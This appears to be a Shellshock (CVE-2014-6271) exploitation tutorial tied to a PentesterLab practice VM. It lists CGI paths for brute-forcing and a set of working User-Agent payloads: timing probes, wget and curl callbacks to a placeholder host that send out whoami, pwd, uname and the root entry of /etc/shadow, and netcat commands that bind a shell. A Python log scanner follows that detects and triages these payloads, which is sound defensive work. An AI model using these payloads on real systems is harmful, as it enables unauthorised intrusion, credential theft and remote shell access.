A quick tutorial on how to exploit Shellshock (CVE-2014-6271) using timing attacks, remote confirmation and gaining a shell back to the host.
CC: https://twitter.com/CrowdShield
Download the Pentesterlab Shellshock VM here: https://pentesterlab.com/exercises/cve-2014-6271
Shellshock CGI-BIN Brute Force List:
/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/status
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php
Shellshock User-Agent Strings:
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=4"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://yourdomain/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 3 && curl http://yourdomain/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=9&?vuln=9"
() { :;}; echo vulnerable 10
() { :;}; wget http://yourdomain/shellshock.txt?vuln=11
() { :;}; curl http://yourdomain/shellshock.txt?vuln=12
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://yourdomain/shellshock.txt?vuln=13;curl http://yourdomain/shellshock.txt?vuln=15;\");'
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
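Every string above starts with the same bash function-definition prefix, and a CGI server hands User-Agent and Referer to bash as HTTP_USER_AGENT and HTTP_REFERER, which is what a defender can key on. The following is an added example, not part of the original tutorial: it scans Apache combined-format access logs for that prefix in both headers and triages each hit as a timing probe, an out-of-band callback or a listener/shell attempt. The log lines and the host callback.example are constructed.

```python
import re

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent".
# Embedded quotes inside a field are logged as \" so the quoted-field pattern allows escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) '
                    + QUOTED + ' ' + QUOTED + '$')
# Shellshock trigger: a value that begins with a bash function definition, "() {".
# CGI exports User-Agent and Referer as HTTP_USER_AGENT / HTTP_REFERER, so check both.
TRIGGER_RE = re.compile(r'^\s*\(\s*\)\s*\{')

def classify(value):
    """Rough triage of what the injected command is trying to do."""
    if re.search(r'\bnc\b.*-e\s*/bin/(?:ba)?sh', value):
        return "shell"       # spawns a listener bound to a shell (vuln=24..27 style)
    if re.search(r'\bsleep\s+\d+', value):
        return "timing"      # blind confirmation via response delay
    if re.search(r'\b(?:curl|wget)\b', value):
        return "callback"    # out-of-band confirmation to an attacker-controlled host
    return "generic"

def scan_log(lines):
    """Return one finding per header that carries a Shellshock trigger."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _ts, request, _status, _bytes, referer, user_agent = m.groups()
        parts = request.split()
        path = parts[1] if len(parts) >= 2 else request
        for field, value in (("user_agent", user_agent), ("referer", referer)):
            if TRIGGER_RE.search(value):
                findings.append({"ip": ip, "path": path, "field": field,
                                 "kind": classify(value)})
    return findings

# Constructed sample lines (not real traffic); callback.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.2 - - [24/Sep/2014:18:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [24/Sep/2014:18:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"sleep 6 && echo vulnerable 6\\""',
    '10.0.0.5 - - [24/Sep/2014:18:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 '
    '"() { :;}; wget http://callback.example/shellshock.txt?vuln=11" "curl/7.35.0"',
    '10.0.0.9 - - [24/Sep/2014:18:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"nc -lvvp 1234 -e /bin/bash\\""',
]
```

Running `scan_log(SAMPLE_LOG)` yields three findings (timing, callback, shell); a real deployment would feed it the live access log and alert on any "shell" or "callback" hit against a /cgi-bin/ path.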